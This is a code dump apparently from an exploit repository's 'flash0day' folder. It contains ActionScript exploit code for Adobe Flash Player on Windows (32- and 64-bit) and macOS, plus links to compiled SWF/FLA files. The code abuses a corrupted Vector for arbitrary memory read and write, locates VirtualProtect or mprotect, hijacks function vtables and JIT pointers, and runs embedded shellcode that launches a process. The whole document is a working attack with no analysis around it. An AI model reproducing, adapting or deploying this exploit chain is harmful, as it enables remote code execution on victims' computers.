261 | 					}
262 | 					// get _LINKEDIT offset
263 | 					else if (f == 0x19 && Get32(lc + 0xa) == 0x4b4e494c) {
264 | 						link = Get(lc + 0x28)
265 | 						offs = Get(lc + 0x18);
266 | 						if (offs > b) offs -= b;
267 | 						offs -= link;
268 | 					}					
269 | 					// check for LC_SYMTAB
270 | 					else if (sym == 0 && f == 2) {
271 | 						sym = b + Get32(lc + 8);
272 | 						symCnt = Get32(lc + 12);
273 | 						str = b + Get32(lc + 16);
274 | 						strCnt = Get32(lc + 20);
275 | 					}
276 | 					// check for LC_DYSYMTAB
277 | 					else if (isym == 0 && f == 11) {
278 | 						isym = b + Get32(lc + 0x38);
279 | 					}
280 | 
281 | 					if (stub != 0 && sym != 0 && isym != 0) break;
282 | 					
283 | 					// move to the next LC
284 | 					lc += Get32(lc + 4);
285 | 				}
286 | 						
287 | 				// check results
288 | 				if (stub <= b || stubCnt == 0 || sym <= b || str <= b || isym <= b)
289 | 					throw new Error("stub = " + Hex(stub) + ", stubCnt = " + stubCnt + ", stubSize = " + stubSize 
290 | 									+ ", isym = " + Hex(isym) + ", sym = " + Hex(sym) + ", str = " + Hex(str));
291 | 				
292 | 				// add _LINKEDIT segment offset
293 | 				if (offs > 0) {
294 | 					link += b;
295 | 					if (sym >= link) sym += offs;
296 | 					if (isym >= link) isym += offs;
297 | 					if (str >= link) str += offs;
298 | 				}
299 | 			
300 | 				//logAdd("stub = " + Hex(stub) + ", stubCnt = " + stubCnt + ", stubSize = " + stubSize + ", isym = " + Hex(isym) 
301 | 					   //+ ", sym = " + Hex(sym) + ", str = " + Hex(str) + ", link = " + Hex(link) + ", offs = " + Hex(offs));		
302 | 			 
303 | 				// find '_mprotect' symbol 
304 | 				for(i=0; i < stubCnt; i++, isym+=4) {
305 | 					// get symbol index
306 | 					f = Get32(isym);
307 | 					if (f == 0 || f > symCnt) throw new Error("isym = " + Hex(isym) + " -> " + Hex(f));
308 | 					
309 | 					// get string index
310 | 					f = Get32(sym + f*16);
311 | 					if (f == 0 || f > strCnt) throw new Error("sym = " + Hex(sym) + " -> " + Hex(f));
312 | 					
313 | 					// compare string with '_mpr' and 'ect'0
314 | 					if (Get32(str + f) == 0x72706d5f && Get32(str + f+6) == 0x746365) {
315 | 						// check stub pointer
316 | 						stub += i*stubSize;
317 | 						f = Get32(stub);
318 | 						if ((f & 0xffff) == 0x25ff) return stub; // ok
319 | 						
320 | 						logAdd('_mprotect stub = ' + Hex(stub) + " -> " + Hex(f));
321 | 						break;
322 | 					}
323 | 				}
324 | 				
325 | 				if (i >= stubCnt) throw new Error("can't find '_mprotect' stub");
326 | 			} 
327 | 			catch (e:Error) 
328 | 			{
329 | 				logAdd("FindMP() " + e.toString());
330 | 			}
331 | 			
332 | 			return 0;
333 | 		}
334 | 		
335 | 		// declare dummy victim function
336 | 		static function Payload(...a){}				
337 | 		
338 | 		// corrupts Payload function and calls mprotect()
339 | 		static function CallMP(mp:Number):Number
340 | 		{
341 | 			// generate Payload() function object
342 | 			Payload();
343 | 			Payload.call(null);
344 | 
345 | 			// find vtable pointer in Payload()
346 | 			var p:Number = GetAddr(Payload);
347 | 			var ptbl:Number = Get(Get(Get(p + 0x10) + 0x28) + 8) + (_isDbg ? 0x120:0x108);
348 | 			// save old pointers
349 | 			var p1:Number = Get(ptbl);
350 | 			var p2:Number = Get(p+0x38);
351 | 			var p3:Number = Get(p+0x40);
352 | 			var p4:Number = Get(p1-8);
353 | 			//logAdd(Dump(p,16) + "
" + Hex(p1) + ", " + Hex(p2) + ", " + Hex(p3));
354 | 			
355 | 			// allocate storage for payload and get his address
356 | 			var len:uint = _x64.length;
357 | 			var v:Vector. = new Vector.(Math.max(0x700, len + 0x400));
358 | 			var vAddr:Number = GetAddr(v);
359 | 			logAdd("x64[] object = " + Hex(vAddr));
360 | 			vAddr += _isDbg ? 0x38 : 0x30;
361 | 			if (Get(vAddr) < 0x10000) vAddr -= 8; // for FP 11.4
362 | 			vAddr = Get(vAddr) + 0x10;
363 | 			var u:uint = (0x1000 - (vAddr & 0xfff)) >>> 2;
364 | 			vAddr += u*4; // for page alignment
365 | 			logAdd("x64[] data = " + Hex(vAddr));
366 | 			_gc.push(v);
367 | 			
368 | 			// create copy of vtable
369 | 			var j:uint = u;
370 | 			for(var i:uint; i < 0x100; i++, j++) v[j] = Get32(p1 + i*4);
371 | 			var p11:Number = Get(p1)-0x100;
372 | 			for(i=0; i < 0x200; i++, j++) v[j] = Get32(p11 + i*4);
373 | 			// set new vtable pointer 
374 | 			v[u-2] = Low(p4); 
375 | 			v[u-1] = Hi(p4);
376 | 			v[u+0] = Low(vAddr + 0x140*4); 
377 | 			v[u+1] = Hi(vAddr + 0x140*4); 			
378 | 			// redirect one method pointer to mprotect()
379 | 			v[u+0x140 + 16] = Low(mp); 
380 | 			v[u+0x140 + 17] = Hi(mp); 
381 | 			
382 | 			// set second arg for mprotect()
383 | 			Set(p+0x38, 0x1000 * ((len >>> 12) + 1));
384 | 			// set third arg = 7 = PROT_READ + PROT_WRITE + PROT_EXEC
385 | 			Set(p+0x40, 7);
386 | 			
387 | 			// replace vtable pointer in Payload() and set first arg for mprotect()
388 | 			Set(ptbl, vAddr);
389 | 			
390 | 			// call mprotect(vAddr, size, 7)
391 | 			Payload.call(null);
392 | 			
393 | 			// restore old pointers
394 | 			Set(ptbl, p1);
395 | 			Set(p+0x38, p2);
396 | 			Set(p+0x40, p3);
397 | 			
398 | 			// copy _x64[] into v[]
399 | 			for(i=0; i < len; i++, u++) v[u] = _x64[i];
400 | 			
401 | 			// return pointer to payload
402 | 			return vAddr;
403 | 		}
404 | 		
405 | 		
406 | 		//
407 | 		static function Exec()
408 | 		{										
409 | 			try 
410 | 			{													
411 | 				// find mprotect() address
412 | 				var mpAddr:Number = FindMP();
413 | 				logAdd("mprotect() address = " + Hex(mpAddr));
414 | 				
415 | 				// call mprotect()
416 | 				var xAddr:Number = CallMP(mpAddr);	
417 | 		
418 | 				// find Payload JIT code pointer
419 | 				var payAddr:Number = GetAddr(Payload);
420 | 				logAdd("Payload() object = " + Hex(payAddr));
421 | 				payAddr = Get(Get(payAddr + 0x38) + 0x10) + 8;
422 | 				var old:Number = Get(payAddr);
423 | 				//logAdd("Payload() address = " + Hex(old));
424 | 				
425 | 				// replace JIT pointer by payload pointer
426 | 				Set(payAddr, xAddr);		
427 | 				
428 | 				// call x64 payload
429 | 				var res = Payload.call(null);
430 | 				logAdd("Payload(): vfork() returns " + res + (res == 1 ? " (in sandbox)":" (pid)"));
431 | 					
432 | 				// restore old pointer
433 | 				Set(payAddr, old);
434 | 			}
435 | 			catch (e:Error) 
436 | 			{
437 | 				logAdd("Exec() " + e.toString());
438 | 			}
439 | 			
440 | 			CleanUp();
441 | 		}
442 | 
443 | 	}
444 | 
445 | }


--------------------------------------------------------------------------------
/flash0day/exp1/ShellWin32.as:
--------------------------------------------------------------------------------
  1 | package
  2 | {
  3 | 	import flash.utils.ByteArray;
  4 | 	
  5 | 	class ShellWin32 extends MyClass
  6 | 	{
  7 | 		static var
  8 | 			_v:Vector.,	// uint vector with corrupted length >= 0x40000000
  9 | 			_vAddr:uint,		// _v[0] address
 10 | 			_mc:MyClass2,
 11 | 			_mcOffs:uint,		// index of mc.o1 within _v[]
 12 | 			
 13 | 			// x32 shellcode // searches and calls CreateProcessA("calc.exe",...) and returns eax as uint atom
 14 | 			_x32:Vector. = Vector.([			
 15 | 				0x83EC8B55, 0x5153ACC4, 0x058B6457, 0x00000030, 0x8B0C408B, 0x008B0C40, 0x588B008B, 0x03D88918,
 16 | 				0x508B3C40, 0x8BDA0178, 0xDF01207A, 0x078BC931, 0x3881D801, 0x61657243, 0x78811C75, 0x4173730B,
 17 | 				0x8B137500, 0xD8012442, 0x4804B70F, 0x011C528B, 0x821C03DA, 0xC78309EB, 0x4A3B4104, 0x8DCF7C18,
 18 | 				0x8D50F045, 0x3157AC7D, 0x0011B9C0, 0xABF30000, 0x44AC45C7, 0x50000000, 0x50505050, 0x0009E850,
 19 | 				0x61630000, 0x652E636C, 0x50006578, 0x595FD3FF, 0x03E0C15B, 0xC906C083, 0x909090C3
 20 | 			]);
 21 | 			 
 22 | 		// converts uint to hex string
 23 | 		static function Hex(u:uint):String
 24 | 		{
 25 | 			if (u <= 9 ) return u.toString() 
 26 | 			else return "0x" + u.toString(16);
 27 | 		}
 28 | 		
 29 | 		// init global vars
 30 | 		static function Init(v:Vector., vAddr:uint, mc:MyClass2, mcOffs:uint):Boolean
 31 | 		{
 32 | 			_v = v; _vAddr = vAddr; _mc = mc; _mcOffs = mcOffs;
 33 | 			
 34 | 			logAdd("v[0] address = " + Hex(_vAddr));
 35 | 			return Get(vAddr - 8) == v.length;
 36 | 		}			
 37 | 		
 38 | 		// restores corrupted memory
 39 | 		static function CleanUp()
 40 | 		{
 41 | 			// restore _v.length
 42 | 			Set(_vAddr - 0x8, 0x3f0);
 43 | 		}
 44 | 		
 45 | 		// reads uint from the custom memory address
 46 | 		static function Get(addr:uint):uint
 47 | 		{
 48 | 		 	if (addr < 0x10000) throw new Error("Get() at addr = " + Hex(addr)); // bad pointer
 49 | 			return _v[(addr - _vAddr) >>> 2];
 50 | 		}
 51 | 		
 52 | 		// writes uint into the custom memory address
 53 | 		static function Set(addr:uint, val:uint)
 54 | 		{
 55 | 		 	if (addr < 0x10000) throw new Error("Set() to addr = " + Hex(addr)); // bad pointer
 56 | 			_v[(addr - _vAddr) >>> 2] = val;
 57 | 		}		
 58 | 		
 59 | 		// returns object's address 
 60 | 		static function GetAddr(obj:Object):uint
 61 | 		{
 62 | 			_mc.o1 = obj;
 63 | 			return _v[_mcOffs] - 1; // atom decrement
 64 | 		}
 65 | 		
 66 | 		// searches for the kernel32.VirtualProtect() address
 67 | 		static function FindVP():uint
 68 | 		{ 
 69 | 			try 
 70 | 			{
 71 | 				// find IMAGE_DOS_HEADER
 72 | 				var u:uint, b:uint = _v[_mcOffs-3]; // b = vtable pointer inside dll/exe
 73 | 				b = uint(b & 0xffff0000) - 0x400000 - _vAddr;
 74 | 				for(var i:uint; i < 0x90; i++, b -= 0x10000){
 75 | 					// check 'MZ'
 76 | 					u = b >>> 2;
 77 | 					if (uint(_v[u] & 0xffff) == 0x5a4d) break; 
 78 | 				}
 79 | 				if (i >= 0x90) throw new Error("can't find MZ from " + Hex(_v[_mcOffs-3]));
 80 | 				
 81 | 				// get IMAGE_NT_HEADERS
 82 | 				u += 15;
 83 | 				u = (b + _v[u]) >>> 2;
 84 | 				// check 'PE'
 85 | 				if (_v[u] != 0x4550) throw new Error("can't find PE");
 86 | 				
 87 | 				// get IMAGE_IMPORT_DIRECTORY
 88 | 				u += 33;
 89 | 				var size:uint = _v[u] >>> 2
 90 | 				u = uint(b + _v[--u]) >>> 2; 
 91 | 				
 92 | 				// find kernel32.dll
 93 | 				var v:Vector. = new Vector.(4);
 94 | 				var oft:uint, ft:uint, j:uint, k:uint;
 95 | 				u += 3;
 96 | 				for(i=3; i < size; i += 5, u += 5){
 97 | 					// read dll name into vector
 98 | 					j = (b + _v[u]) >>> 2; 
 99 | 					for(k=0; k < 4; k++, j++) v[k] = _v[j]; 
100 | 					
101 | 					// check dll name
102 | 					if (MyUtils.IsEqual(v, "KERNEL32.DLL")) {
103 | 						oft = _v[u-3]; ft = _v[u+1]; 
104 | 						break;
105 | 					}
106 | 				}
107 | 				
108 | 				if (oft == 0 || ft == 0) throw new Error("can't find kernel32");
109 | 				
110 | 				// find VirtualProtect() address
111 | 				u = uint(b + oft) >>> 2;
112 | 				v.length = 5;
113 | 		
114 | 				for(i=0; i < 256; i++, u++){
115 | 					// get proc name
116 | 					j = _v[u];
117 | 					if (j == 0) throw new Error("can't find VirtualProtect");
118 | 					j = (b + j) >>> 2; 
119 | 					for(k=0; k < 5; k++, j++) v[k] = _v[j]; 
120 | 					
121 | 					// check proc name
122 | 					if (MyUtils.IsEqual(v, "VIRTUALPROTECT", 2) && (MyUtils._bArr.readByte() == 0)) {
123 | 						j = uint(b + ft + i*4) >>> 2;
124 | 						return _v[j];
125 | 					}
126 | 				}
127 | 			} 
128 | 			catch (e:Error) 
129 | 			{
130 | 				logAdd("FindVP() " + e.toString());
131 | 			}
132 | 			
133 | 			return 0;
134 | 		}
135 | 		
136 | 		// declare dummy victim function
137 | 		static function Payload(...a){}
138 | 		
139 | 		// corrupts Payload function and calls VirtualProtect()
140 | 		static function CallVP(vp:uint, xAddr:uint, xLen:uint)
141 | 		{
142 | 			// generate Payload function object
143 | 			Payload();
144 | 
145 | 			// find vtable pointer in Payload()
146 | 			var p:uint = GetAddr(Payload);
147 | 			var ptbl:uint = Get(Get(Get(Get(p + 8) + 0x14) + 4) + (_isDbg ? 0xbc:0xb0));
148 | 			// save old pointers
149 | 			var p1:uint = Get(ptbl);
150 | 			var p2:uint = Get(p+0x1c);
151 | 			var p3:uint = Get(p+0x20);
152 | 			
153 | 			// create copy of vtable
154 | 			for(var i:uint; i < 0x100; i++) _v[i] = Get(p1-0x80 + i*4);
155 | 			// redirect one pointer to VirtualProtect()
156 | 			_v[0x20+7] = vp; 
157 | 			
158 | 			// set first arg for VirtualProtect()
159 | 			Set(p+0x1c, xAddr);
160 | 			// set second arg
161 | 			Set(p+0x20, xLen);
162 | 			// set third arg = 0x40 PAGE_EXECUTE_READWRITE
163 | 			var args:Array = new Array(0x41);			
164 | 			
165 | 			// replace vtable pointer in Payload()
166 | 			Set(ptbl, _vAddr + 0x80);
167 | 			
168 | 			// call VirtualProtect()
169 | 			var res = Payload.call.apply(null, args);
170 | 			
171 | 			// restore old pointers
172 | 			Set(ptbl, p1);
173 | 			Set(p+0x1c, p2);
174 | 			Set(p+0x20, p3);
175 | 			
176 | 			// res should be nonzero (eax != 0)
177 | 			//if (("" + res) == "undefined") throw new Error("VirtualProtect() result = 0")
178 | 			//else logAdd("VirtualProtect() result = " + res);
179 | 		}
180 | 		
181 | 		//
182 | 		static function Exec()
183 | 		{										
184 | 			try 
185 | 			{						
186 | 				// get _x32[0] address
187 | 				var xAddr:uint = GetAddr(_x32);
188 | 				logAdd("x32[] object = " + Hex(xAddr));
189 | 				xAddr += _isDbg ? 0x1c : 0x18;
190 | 				if (Get(xAddr) < 0x10000) xAddr -= 4; // for FP 11.4
191 | 				xAddr = Get(xAddr) + 8;
192 | 				logAdd("x32[] data = " + Hex(xAddr));				
193 | 				
194 | 				// get kernel32.VirtualProtect() address
195 | 				var vpAddr:uint = FindVP();
196 | 				logAdd("VirtualProtect() address = " + Hex(vpAddr));
197 | 				if (vpAddr == 0) throw new Error("vpAddr == 0");
198 | 				
199 | 				// call VirtualProtect()
200 | 				CallVP(vpAddr, xAddr, _x32.length*4);		
201 | 				
202 | 				// find Payload JIT code pointer
203 | 				var payAddr:uint = GetAddr(Payload);
204 | 				logAdd("Payload() object = " + Hex(payAddr));
205 | 				payAddr = Get(Get(payAddr + 0x1c) + 8) + 4;
206 | 				var old:uint = Get(payAddr);
207 | 
208 | 				// replace JIT pointer by &_x32[0]
209 | 				Set(payAddr, xAddr);		
210 | 				
211 | 				// call x32 payload
212 | 				var res = Payload.call(null);
213 | 				logAdd("CreateProcessA() returns " + res + (res == 0 ? " (in sandbox)":""));
214 | 					
215 | 				// restore old pointer
216 | 				Set(payAddr, old);
217 | 			}
218 | 			catch (e:Error) 
219 | 			{
220 | 				logAdd("Exec() " + e.toString());
221 | 			}
222 | 			
223 | 			CleanUp();
224 | 		}
225 | 
226 | 	}
227 | 
228 | }


--------------------------------------------------------------------------------
/flash0day/exp1/ShellWin64.as:
--------------------------------------------------------------------------------
  1 | package
  2 | {
  3 | 	import flash.utils.ByteArray;
  4 | 	import flash.utils.Endian;
  5 | 	
  6 | 	class ShellWin64 extends MyClass
  7 | 	{
  8 | 		static var
  9 | 			_v:Vector.,	// uint vector with corrupted length
 10 | 			_vAddr:Number,		// _v[0] address
 11 | 			_base:Number,
 12 | 			_baseMax:Number,
 13 | 			_baseOld:Number,
 14 | 			_mc:MyClass2,		// descendant of ByteArray allocated right after _v[]
 15 | 			_mcOffs:uint,		// index of mc.o1 within _v[]
 16 | 			N32:Number 			= Math.pow(2,32),
 17 | 			
 18 | 			// x64 shellcode 
 19 | 			_x64:Vector. = Vector.([			
 20 | 				// searches and calls CreateProcessA("calc.exe",...) and returns rax as uint atom
 21 | 				0xC4834855, 0xEC8B4880, 0x65575153, 0x25048B48, 0x00000060, 0x18408B48, 0x10408B48, 0x48008B48,
 22 | 				0x8B48008B, 0x438B3058, 0xD801483C, 0x0088908B, 0x01480000, 0x207A8BDA, 0x48DF0148, 0x078BC931,
 23 | 				0x81D80148, 0x65724338, 0x81217561, 0x73730B78, 0x18750041, 0x4824428B, 0xB70FD801, 0x7A8B4804,
 24 | 				0xDF01481C, 0x48873C8B, 0x0CEBFB01, 0x04C78348, 0x3BC1FF48, 0xC67C184A, 0x48E08948, 0x0008E081,
 25 | 				0x29480000, 0x485050C4, 0x5000458D, 0x187D8D48, 0xC0314857, 0x00000DB9, 0xAB48F300, 0x681845C7,
 26 | 				0xE8000000, 0x00000009, 0x636C6163, 0x6578652E, 0x31485A00, 0x515151C9, 0xC9894951, 0x48C88949,
 27 | 				0x4820EC83, 0x8348D3FF, 0xC14850C4, 0x834803E0, 0x595906C0, 0x5FCC0148, 0x8D485B59, 0x000080A5,
 28 | 				0x90C35D00
 29 | 				
 30 | 				/*/ "empty" payload // returns 12345678
 31 | 				0x90909090,
 32 | 				0x614EB848, 0x000000BC, 	// mov rax, 0xBC614E;
 33 | 				0xC1480000, 0x834803E0, 	// shl rax,3; add rax,6;	// rax as int atom
 34 | 				0x90C306C0					// ret*/
 35 | 			]);
 36 | 			
 37 | 		// converts two uints to hex string
 38 | 		static function Hex(n:Number):String
 39 | 		{
 40 | 			if (n >= 0 && n <= 9) return n.toString() 
 41 | 			else return "0x" + n.toString(16);
 42 | 		}			
 43 | 		
 44 | 		// init global vars
 45 | 		static function Init(v:Vector., offs:uint, mc:MyClass2, mcOffs:uint):Boolean
 46 | 		{
 47 | 			_v = v; _mc = mc; _mcOffs = mcOffs;
 48 | 			
 49 | 			_vAddr = Get64(mcOffs, 0xfffff000) - offs + 0x10;
 50 | 			_baseOld = Get64(mcOffs-10);
 51 | 			logAdd("v[0] address = " + Hex(_vAddr));
 52 | 			logAdd("mc old base = " + Hex(_baseOld));
 53 | 			
 54 | 			// prepare new base for mc
 55 | 			v[6] = 0xffffffff; // ByteArray::capacity
 56 | 			v[7] = 0xfffffffe; // ByteArray::length
 57 | 			mc.endian = Endian.LITTLE_ENDIAN;
 58 | 			
 59 | 			// set new base
 60 | 			Set64(mcOffs-10, _vAddr);
 61 | 			_base = 0;
 62 | 			_baseMax = 0xfffffff0;
 63 | 			
 64 | 			// check results
 65 | 			var len:uint = mc.length;
 66 | 			logAdd("mc.length = " + Hex(len));
 67 | 			return len == v[7];
 68 | 		}		
 69 | 		
 70 | 		// restores corrupted memory
 71 | 		static function CleanUp()
 72 | 		{
 73 | 			// restore _v.length
 74 | 			Set32(_vAddr - 0x10, 0x3f0);
 75 | 			
 76 | 			_v[6] = 0; // _mc.capacity
 77 | 			_v[7] = 0; // _mc.length
 78 | 		}
 79 | 		
 80 | 		// join two uints as uint64
 81 | 		static function Num(low:uint, hi:uint):Number
 82 | 		{
 83 | 			var n:Number = hi;
 84 | 			if (n != 0) n *= N32;
 85 | 			n += low;
 86 | 			return n;
 87 | 		}
 88 | 		
 89 | 		// get high uint from uint64
 90 | 		static function Hi(n:Number):uint
 91 | 		{	
 92 | 			return uint(Math.floor(n / N32) & (N32-1));
 93 | 		}
 94 | 		
 95 | 		// get low uint from uint64
 96 | 		static function Low(n:Number):uint
 97 | 		{	
 98 | 			return uint(n & (N32-1));
 99 | 		}
100 | 		
101 | 		// reads uint64 from _v[]
102 | 		static function Get64(offs:uint, mask:uint = 0xffffffff):Number
103 | 		{
104 | 			return Num(_v[offs] & mask, _v[offs+1]);
105 | 		}
106 | 			
107 | 		// writes uint64 into _v[]
108 | 		static function Set64(offs:uint, n:Number)
109 | 		{
110 | 			_v[offs] = Low(n);
111 | 			_v[offs+1] = Hi(n);
112 | 		}
113 | 			
114 | 		// sets new address pointer for _mc[0]
115 | 		static function SetBase(addr:Number)
116 | 		{
117 | 			if (addr < _base || addr >= _baseMax) {
118 | 				Set64(4, addr); // _v[4],[5]
119 | 				_base = addr;
120 | 				_baseMax = addr + 0xfffffff0;
121 | 			}
122 | 		}
123 | 		
124 | 		// reads uint from the memory address
125 | 		static function Get32(addr:Number):uint
126 | 		{
127 | 		 	if (addr < 0x10000) throw new Error("Get32() at addr = " + Hex(addr)); // bad pointer
128 | 			
129 | 			SetBase(addr);
130 | 			_mc.position = uint((addr - _base) & (N32-1));
131 | 			return _mc.readUnsignedInt();
132 | 		}
133 | 		
134 | 		// writes uint into the memory address
135 | 		static function Set32(addr:Number, u:uint)
136 | 		{
137 | 		 	if (addr < 0x10000) throw new Error("Set32() to addr = " + Hex(addr)); // bad pointer
138 | 			
139 | 			SetBase(addr);
140 | 			_mc.position = uint((addr - _base) & (N32-1));
141 | 			_mc.writeUnsignedInt(u);
142 | 		}	
143 | 		
144 | 		// reads uint64 from the memory address
145 | 		static function Get(addr:Number):Number
146 | 		{
147 | 		 	if (addr < 0x10000) throw new Error("Get() at addr = " + Hex(addr)); // bad pointer
148 | 			
149 | 			SetBase(addr);
150 | 			_mc.position = uint((addr - _base) & (N32-1));
151 | 			var lo:uint = _mc.readUnsignedInt();
152 | 			var hi:uint = _mc.readUnsignedInt();
153 | 			return Num(lo,hi);
154 | 		}
155 | 		
156 | 		// writes uint64 into the memory address
157 | 		static function Set(addr:Number, n:Number)
158 | 		{
159 | 		 	if (addr < 0x10000) throw new Error("Set() to addr = " + Hex(addr)); // bad pointer
160 | 			
161 | 			SetBase(addr);
162 | 			_mc.position = uint((addr - _base) & (N32-1));
163 | 			_mc.writeUnsignedInt(Low(n));
164 | 			_mc.writeUnsignedInt(Hi(n));
165 | 		}		
166 | 		
167 | 		// returns object's address 
168 | 		static function GetAddr(obj:Object):Number
169 | 		{
170 | 			_mc.o1 = obj;
171 | 			return Get64(_mcOffs) - 1; // atom decrement
172 | 		}
173 | 		
174 | 		// get memory dump // for RnD
175 | 		static function Dump(addr:Number, len:uint):String
176 | 		{
177 | 			var str:String = "";
178 | 			for(var i:uint; i < len; i++, addr+=8) {
179 | 				str += Get(addr).toString(16) + ",";
180 | 				if (i % 8 == 7) str += "
";
181 | 			}
182 | 			return str;
183 | 		}
184 | 		
185 | 		// searches for the kernel32.VirtualProtect() address
186 | 		static function FindVP():Number
187 | 		{ 
188 | 			try 
189 | 			{
190 | 				// find IMAGE_DOS_HEADER
191 | 				var b:Number = Get64(_mcOffs-4, 0xffff0000) - 0x800000;
192 | 				for(var i:uint; i < 0xf0; i++, b -= 0x10000){
193 | 					// check 'MZ'
194 | 					if (uint(Get32(b) & 0xffff) == 0x5a4d) { /*logAdd("mz offset = " + i);*/ break; } 
195 | 				}
196 | 				if (i >= 0xf0) throw new Error("can't find MZ at " + Hex(b));
197 | 				
198 | 				// get IMAGE_NT_HEADERS
199 | 				var n:Number = b + Get32(b + 0x3c);
200 | 				// check 'PE'
201 | 				if (Get32(n) != 0x4550) throw new Error("can't find PE at " + Hex(n));
202 | 				
203 | 				// get IMAGE_IMPORT_DIRECTORY
204 | 				var size:uint = Get32(n + 0x94);
205 | 				n = b + Get32(n + 0x90); 
206 | 				
207 | 				// find kernel32.dll
208 | 				var v:Vector. = new Vector.(4);
209 | 				var oft:Number, ft:Number, str:Number, k:uint;
210 | 				
211 | 				for(i=0; i < size; i += 5*4){
212 | 					// read dll name into vector
213 | 					str = b + Get32(n + i + 3*4); 
214 | 					for(k=0; k < 4; k++, str+=4) v[k] = Get32(str);
215 | 					
216 | 					// check dll name
217 | 					if (MyUtils.IsEqual(v, "KERNEL32.DLL")) {
218 | 						oft = Get32(n + i); 
219 | 						ft = Get32(n + i + 4*4); 
220 | 						break;
221 | 					}
222 | 				}
223 | 				
224 | 				if (oft == 0 || ft == 0) throw new Error("can't find kernel32");
225 | 				
226 | 				// find VirtualProtect() address
227 | 				v.length = 5; oft += b;
228 | 				for(i=0; i < 0x180; i++, oft+=8){
229 | 					// get proc name
230 | 					str = Get(oft);
231 | 					if (str == 0) throw new Error("can't find VirtualProtect"); 
232 | 					str += b;
233 | 					for(k=0; k < 5; k++, str+=4) v[k] = Get32(str); 
234 | 					
235 | 					// check proc name
236 | 					if (MyUtils.IsEqual(v, "VIRTUALPROTECT", 2) && (MyUtils._bArr.readByte() == 0))
237 | 						return Get(b + ft + i*8);
238 | 				}
239 | 			} 
240 | 			catch (e:Error) 
241 | 			{
242 | 				logAdd("FindVP() " + e.toString());
243 | 			}
244 | 			
245 | 			return 0;
246 | 		}
247 | 		
248 | 		// declare dummy victim function
249 | 		static function Payload(...a){}
250 | 		
251 | 		// corrupts Payload function and calls VirtualProtect()
252 | 		static function CallVP(vp:Number):Number
253 | 		{
254 | 			// generate Payload() function object
255 | 			Payload();
256 | 			var args:Array = new Array(4);	
257 | 			Payload.apply(null, args);
258 | 			
259 | 			// find vtable pointer in Payload() object
260 | 			var p:Number = GetAddr(Payload);
261 | 			var ptbl:Number = Get(Get(Get(p + 0x10) + 0x28) + 8) + (_isDbg ? 0x120:0x108); // see Function.apply() in IDA64 for offset values
262 | 			// save original pointers
263 | 			var p1:Number = Get(ptbl);
264 | 			var p2:Number = Get(p+0x38);
265 | 			var p3:Number = Get(p+0x40);
266 | 			var p4:Number = Get(p1-8);
267 | 			//logAdd(Hex(p) + ": " + Dump(p,16) + "
" + Hex(p1) + ", " + Hex(p2) + ", " + Hex(p3));
268 | 			
269 | 			// allocate storage for payload and get his address
270 | 			var len:uint = _x64.length;
271 | 			var v:Vector. = new Vector.(Math.max(0x300, len));
272 | 			var vAddr:Number = GetAddr(v);
273 | 			logAdd("x64[] object = " + Hex(vAddr));
274 | 			vAddr += _isDbg ? 0x38 : 0x30;
275 | 			if (Get(vAddr) < 0x10000) vAddr -= 8; // for FP 11.4
276 | 			vAddr = Get(vAddr) + 0x10;
277 | 			logAdd("x64[] data = " + Hex(vAddr));	
278 | 			_gc.push(v);
279 | 
280 | 			// create copy of vtable
281 | 			for(var i:uint; i < 0x100-2; i++) v[i+2] = Get32(p1 + i*4);
282 | 			var p11:Number = Get(p1) - 0x40*4;
283 | 			for(i=0; i < 0x200; i++) v[i+0x100] = Get32(p11 + i*4);
284 | 			// set new vtable pointer 
285 | 			v[0] = Low(p4); 
286 | 			v[1] = Hi(p4);
287 | 			v[2] = Low(vAddr + 0x140*4); 
288 | 			v[3] = Hi (vAddr + 0x140*4); 
289 | 			// redirect one method pointer to VirtualProtect() // see Function.apply() in IDA64
290 | 			v[0x140 + 12] = Low(vp); 
291 | 			v[0x140 + 13] = Hi(vp); 
292 | 			
293 | 			// set second arg for VirtualProtect()
294 | 			Set(p+0x38, v.length*4);
295 | 			// set third arg = 0x40 PAGE_EXECUTE_READWRITE
296 | 			Set(p+0x40, 0x40);
297 | 			// set fourth arg
298 | 			var pa:Number = GetAddr(args);
299 | 			p4 = Get(pa); // save old val
300 | 			
301 | 			// replace vtable pointer in Payload() and set first arg for VirtualProtect()
302 | 			Set(ptbl, vAddr+8);
303 | 			
304 | 			// call VirtualProtect()
305 | 			Payload.apply(null, args);
306 | 			
307 | 			// restore old pointers
308 | 			Set(ptbl, p1);
309 | 			Set(p+0x38, p2);
310 | 			Set(p+0x40, p3);
311 | 			
312 | 			// check results
313 | 			logAdd("VirtualProtect() result = " + Hex(Get32(pa)));
314 | 			p3 = Get(pa);
315 | 			Set(pa, p4);
316 | 			if (p4 == p3) throw new Error("VirtualProtect() error");
317 | 			
318 | 			// copy _x64[] into v[]
319 | 			for(i=0; i < len; i++) v[i] = _x64[i];
320 | 	
321 | 			// return pointer to payload
322 | 			return vAddr;
323 | 		}
324 | 		
325 | 		//
326 | 		static function Exec()
327 | 		{										
328 | 			try 
329 | 			{									
330 | 				// get kernel32.VirtualProtect() address
331 | 				var vpAddr:Number = FindVP();
332 | 				logAdd("VirtualProtect() address = " + Hex(vpAddr));
333 | 				if (vpAddr == 0) throw new Error("vpAddr == 0");
334 | 				
335 | 				// call VirtualProtect()
336 | 				var xAddr:Number = CallVP(vpAddr);		
337 | 				
338 | 				// find Payload JIT code pointer
339 | 				var payAddr:Number = GetAddr(Payload);
340 | 				logAdd("Payload() object = " + Hex(payAddr));
341 | 				payAddr = Get(Get(payAddr + 0x38) + 0x10) + 8;
342 | 				var old:Number = Get(payAddr);
343 | 				//logAdd("Payload() address = " + Hex(payAddr));
344 | 				
345 | 				// replace JIT pointer by payload pointer
346 | 				Set(payAddr, xAddr);		
347 | 				
348 | 				// call x64 payload
349 | 				var res = Payload.call(null);
350 | 				logAdd("CreateProcessA() returns " + res + (res == 0 ? " (in sandbox)":""));
351 | 					
352 | 				// restore old pointer
353 | 				Set(payAddr, old);
354 | 			}
355 | 			catch (e:Error) 
356 | 			{
357 | 				logAdd("Exec() " + e.toString());
358 | 			}
359 | 			
360 | 			CleanUp();
361 | 		}
362 | 
363 | 	}
364 | 
365 | }


--------------------------------------------------------------------------------
/flash0day/exp1/exp1.fla:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/flash0day/exp1/exp1.fla


--------------------------------------------------------------------------------
/flash0day/exp1/exp1.swf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/flash0day/exp1/exp1.swf


--------------------------------------------------------------------------------
